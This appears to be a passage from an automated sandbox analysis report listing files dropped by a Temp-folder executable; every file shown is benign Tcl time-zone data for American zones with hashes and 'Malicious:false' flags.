                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.752946571641783
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8445
                                                                                                                                                                                                                                                    Entropy (8bit):3.7709584779896055
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santa_Isabel) {. {-9223372036854775808 -27568 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1057
                                                                                                                                                                                                                                                    Entropy (8bit):4.04156999168428
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santarem) {. {-9223372036854775808 -13128 0 LMT}. {-1767212472 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3625
                                                                                                                                                                                                                                                    Entropy (8bit):3.8369221295859357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santiago) {. {-9223372036854775808 -16966 0 LMT}. {-2524504634 -16966 0 SMT}. {-1892661434 -18000 0 CLT}. {-1688410800 -16966 0 SMT}. {-1619205434 -14400 0 CLT}. {-1593806400 -16966 0 SMT}. {-1335986234 -18000 0 CLT}. {-1335985200 -14400 1 CLST}. {-1317585600 -18000 0 CLT}. {-1304362800 -14400 1 CLST}. {-1286049600 -18000 0 CLT}. {-1272826800 -14400 1 CLST}. {-1254513600 -18000 0 CLT}. {-1241290800 -14400 1 CLST}. {-1222977600 -18000 0 CLT}. {-1209754800 -14400 1 CLST}. {-1191355200 -18000 0 CLT}. {-1178132400 -14400 0 CLT}. {-870552000 -18000 0 CLT}. {-865278000 -14400 0 CLT}. {-740520000 -10800 1 CLST}. {-736376400 -14400 0 CLT}. {-718056000 -18000 0 CLT}. {-713649600 -14400 0 CLT}. {-36619200 -10800 1 CLST}. {-23922000 -14400 0 CLT}. {-3355200 -10800 1 CLST}. {7527600 -14400 0 CLT}. {24465600 -10800 1 CLST}. {37767600 -14400 0 CLT
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                    Entropy (8bit):4.346772162962135
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santo_Domingo) {. {-9223372036854775808 -16776 0 LMT}. {-2524504824 -16800 0 SDMT}. {-1159773600 -18000 0 EST}. {-100119600 -14400 1 EDT}. {-89668800 -18000 0 EST}. {-5770800 -16200 1 EHDT}. {4422600 -18000 0 EST}. {25678800 -16200 1 EHDT}. {33193800 -18000 0 EST}. {57733200 -16200 1 EHDT}. {64816200 -18000 0 EST}. {89182800 -16200 1 EHDT}. {96438600 -18000 0 EST}. {120632400 -16200 1 EHDT}. {127974600 -18000 0 EST}. {152082000 -14400 0 AST}. {975823200 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7678
                                                                                                                                                                                                                                                    Entropy (8bit):3.782328041884024
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:LdP+2+j+R+u+W+B5+M+A+r+L+v+8+h+2+M+Y+v+c+M+++v+8+/+C+jZ+E+2+A++q:LGWbb8B4
                                                                                                                                                                                                                                                    MD5:B9596E3584EBAFEA5D0257129A03F06D
                                                                                                                                                                                                                                                    SHA1:6FD25D7D4D7A5320D981FF001AAB57EFDB852313
                                                                                                                                                                                                                                                    SHA-256:FA6B2AF6815C1BA6751F0807FEAB49E5E60B4C774A45A96EC6EC3563DA358463
                                                                                                                                                                                                                                                    SHA-512:215BEACD30BC54F416C74A98B597E5B1EEDE627121BF58A12F829E55F921FD3EF9C1C6FF0F639D1929882BC0E7380E73038AA6BFD49E6E7BF28A7711802F4212
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sao_Paulo) {. {-9223372036854775808 -11188 0 LMT}. {-1767214412 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-195429600 -7200 1 BRST}. {-189381600 -7200 0 BRT}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6713
                                                                                                                                                                                                                                                    Entropy (8bit):3.7831757008437528
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:P0pq6GNOHfSPRayJvZbzmgyb9qqv95aZIhlVeDEzm:EqBOHfSPRayHbNyb9FHzm
                                                                                                                                                                                                                                                    MD5:29C14A9AFA37EFB29DF4424EB905D3FA
                                                                                                                                                                                                                                                    SHA1:35C7F008987D19925D2BC8C06F31B2F1B323478E
                                                                                                                                                                                                                                                    SHA-256:424C05FE8CE2EB094A0840C97286EC3E32B03B73AE92BC34F68E4E986041615E
                                                                                                                                                                                                                                                    SHA-512:A5F933CD082BD6D09DAF64D2245EA043D2A11A3E0E3373D3877CD4AAF4D6BB5BF9C62771C16AF097B1C9E34CF035F95967537ECD2521B9D074C3C33A43559E93
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Scoresbysund) {. {-9223372036854775808 -5272 0 LMT}. {-1686090728 -7200 0 CGT}. {323841600 -3600 0 CGST}. {338961600 -7200 0 CGT}. {354679200 0 0 EGST}. {370400400 -3600 0 EGT}. {386125200 0 1 EGST}. {401850000 -3600 0 EGT}. {417574800 0 1 EGST}. {433299600 -3600 0 EGT}. {449024400 0 1 EGST}. {465354000 -3600 0 EGT}. {481078800 0 1 EGST}. {496803600 -3600 0 EGT}. {512528400 0 1 EGST}. {528253200 -3600 0 EGT}. {543978000 0 1 EGST}. {559702800 -3600 0 EGT}. {575427600 0 1 EGST}. {591152400 -3600 0 EGT}. {606877200 0 1 EGST}. {622602000 -3600 0 EGT}. {638326800 0 1 EGST}. {654656400 -3600 0 EGT}. {670381200 0 1 EGST}. {686106000 -3600 0 EGT}. {701830800 0 1 EGST}. {717555600 -3600 0 EGT}. {733280400 0 1 EGST}. {749005200 -3600 0 EGT}. {764730000 0 1 EGST}. {780454800 -3600 0 EGT}. {796179600 0 1 EGST}. {811904400 -3600 0 EGT
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.840231755053259
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L2IAcGEtOFBx+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iL290tO09G
                                                                                                                                                                                                                                                    MD5:65307038DB12A7A447284DF4F3E6A3E8
                                                                                                                                                                                                                                                    SHA1:DC28D6863986D7A158CEF239D46BE9F5033DF897
                                                                                                                                                                                                                                                    SHA-256:3FD862C9DB2D5941DFDBA5622CC53487A7FC5039F7012B78D3EE4B58753D078D
                                                                                                                                                                                                                                                    SHA-512:91BC29B7EC9C49D4020DC26F682D0EFBBBEE83D10D79C766A08C78D5FF04D9C0A09288D9696A378E777B65E0C2C2AC8A218C12F86C45BD6E7B5E204AE5FC2335
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:America/Shiprock) $TZData(:America/Denver).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8376
                                                                                                                                                                                                                                                    Entropy (8bit):3.8797731776796454
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:6G19jJps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:6M9jI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:6A3014865B6330673B4F71C1617C486B
                                                                                                                                                                                                                                                    SHA1:52334201654D421DD97D62D0C12065308E6A9D56
                                                                                                                                                                                                                                                    SHA-256:92C6A715A1994EC61D8879A763EEF2B06FFC15876306DD6262ABBD5D3DA23CE0
                                                                                                                                                                                                                                                    SHA-512:B957F258BDBDDA043AF2FE8D66AE6247998A7CE398A56C641FF4DEA8F70BB63652D8B223F783E82B18570E28AB11E76CB1DA2BE6648F449F9F4D745987E109D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sitka) {. {-9223372036854775808 53927 0 LMT}. {-3225365927 -32473 0 LMT}. {-2188954727 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600 -
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):208
                                                                                                                                                                                                                                                    Entropy (8bit):4.905980413237828
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290txP90e/:MBaIMY9QpI2907P90O
                                                                                                                                                                                                                                                    MD5:B6E45D20EB8CC73A77B9A75578E5C246
                                                                                                                                                                                                                                                    SHA1:19C6BB6ED12B6943CF7BDFFE4C8A8D72DB491E44
                                                                                                                                                                                                                                                    SHA-256:31E60EAC8ABFA8D3DAD501D3BCDCA7C4DB7031B65ADDA24EC11A6DEE1E3D14C3
                                                                                                                                                                                                                                                    SHA-512:C0F3BF8D106E77C1000E45D0A6C8E7C05B7B97EFA2EECCA45FEF48EB42FBDD5336FD551C794064EADFB6919A12813FF66B2F95722877432B4A48B1FBA6C5409D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Barthelemy) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10917
                                                                                                                                                                                                                                                    Entropy (8bit):3.7872036312069963
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Vvprjhbvd8mSGu9EnkBVAZK2GrbrvZeuqpNFT:Vvbvd7SGu9lzoVpDT
                                                                                                                                                                                                                                                    MD5:F87531D6DC9AAFB2B0F79248C5ADA772
                                                                                                                                                                                                                                                    SHA1:E14C52B0F564FA3A3536B7576A2B27D4738CA76B
                                                                                                                                                                                                                                                    SHA-256:0439DA60D4C52F0E777431BF853D366E2B5D89275505201080954D88F6CA9478
                                                                                                                                                                                                                                                    SHA-512:5B43CE25D970EEEFD09865D89137388BD879C599191DE8ACE37DA657C142B6DF63143DBF9DED7659CBD5E45BAB699E2A3AFDD28C76A7CB2F300EBD9B74CDA59D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Johns) {. {-9223372036854775808 -12652 0 LMT}. {-2713897748 -12652 0 NST}. {-1664130548 -9052 1 NDT}. {-1650137348 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1598650148 -9052 1 NDT}. {-1590100148 -12652 0 NST}. {-1567286948 -9052 1 NDT}. {-1551565748 -12652 0 NST}. {-1535837348 -9052 1 NDT}. {-1520116148 -12652 0 NST}. {-1503782948 -9052 1 NDT}. {-1488666548 -12652 0 NST}. {-1472333348 -9052 1 NDT}. {-1457216948 -12652 0 NST}. {-1440883748 -9052 1 NDT}. {-1425767348 -12652 0 NST}. {-1409434148 -9052 1 NDT}. {-1394317748 -12652 0 NST}. {-1377984548 -9052 1 NDT}. {-1362263348 -12652 0 NST}. {-1346534948 -9052 1 NDT}. {-1330813748 -12652 0 NST}. {-1314480548 -9052 1 NDT}. {-1299364148 -12652 0 NST}. {-1283030948 -9052 1 NDT}. {-1267914548 -12652 0 NS
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.878034750755565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290tMp490e/:MBaIMY9QpI290g490O
                                                                                                                                                                                                                                                    MD5:B149DC2A23F741BA943E5511E35370D3
                                                                                                                                                                                                                                                    SHA1:3C8D3CFDB329B7ECB90C19D3EB3DE6F33A063ADD
                                                                                                                                                                                                                                                    SHA-256:36046A74F6BB23EA8EABA25AD3B93241EBB509EF1821CC4BEC860489F5EC6DCA
                                                                                                                                                                                                                                                    SHA-512:CEB38EC2405A3B0A4E09CDD2D69A11884CCB28DA0FD7CF8B344E1472642A0571674D3ED33C639E745DDEEE741E52B0948B86DFFFD324BB07A9F1A6B9F38F898E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Kitts) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.89157166321909
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Lucia) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.888871207225013
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Thomas) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.876306758637305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/St_Vincent) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):845
                                                                                                                                                                                                                                                    Entropy (8bit):4.182525430299964
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Swift_Current) {. {-9223372036854775808 -25880 0 LMT}. {-2030201320 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-747241200 -21600 0 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-684342000 -21600 1 MDT}. {-671040000 -25200 0 MST}. {-652892400 -21600 1 MDT}. {-639590400 -25200 0 MST}. {-631126800 -25200 0 MST}. {-400086000 -21600 1 MDT}. {-384364800 -25200 0 MST}. {-337186800 -21600 1 MDT}. {-321465600 -25200 0 MST}. {-305737200 -21600 1 MDT}. {-292435200 -25200 0 MST}. {-273682800 -21600 1 MDT}. {-260985600 -25200 0 MST}. {73472400 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):329
                                                                                                                                                                                                                                                    Entropy (8bit):4.580220354026118
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tegucigalpa) {. {-9223372036854775808 -20932 0 LMT}. {-1538503868 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}. {1146981600 -18000 1 CDT}. {1154926800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6666
                                                                                                                                                                                                                                                    Entropy (8bit):3.7481713130223295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thule) {. {-9223372036854775808 -16508 0 LMT}. {-1686079492 -14400 0 AST}. {670399200 -10800 1 ADT}. {686120400 -14400 0 AST}. {701848800 -10800 1 ADT}. {717570000 -14400 0 AST}. {733903200 -10800 1 ADT}. {752043600 -14400 0 AST}. {765352800 -10800 1 ADT}. {783493200 -14400 0 AST}. {796802400 -10800 1 ADT}. {814942800 -14400 0 AST}. {828856800 -10800 1 ADT}. {846392400 -14400 0 AST}. {860306400 -10800 1 ADT}. {877842000 -14400 0 AST}. {891756000 -10800 1 ADT}. {909291600 -14400 0 AST}. {923205600 -10800 1 ADT}. {941346000 -14400 0 AST}. {954655200 -10800 1 ADT}. {972795600 -14400 0 AST}. {986104800 -10800 1 ADT}. {1004245200 -14400 0 AST}. {1018159200 -10800 1 ADT}. {1035694800 -14400 0 AST}. {1049608800 -10800 1 ADT}. {1067144400 -14400 0 AST}. {1081058400 -10800 1 ADT}. {1099198800 -14400 0 AST}. {1112508000 -10800 1 ADT}. {1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8058
                                                                                                                                                                                                                                                    Entropy (8bit):3.7473289441354263
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thunder_Bay) {. {-9223372036854775808 -21420 0 LMT}. {-2366733780 -21600 0 CST}. {-1893434400 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {18000 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {126248400 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8470
                                                                                                                                                                                                                                                    Entropy (8bit):3.7667993951223955
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tijuana) {. {-9223372036854775808 -28084 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {21560
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10883
                                                                                                                                                                                                                                                    Entropy (8bit):3.7202964099536917
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
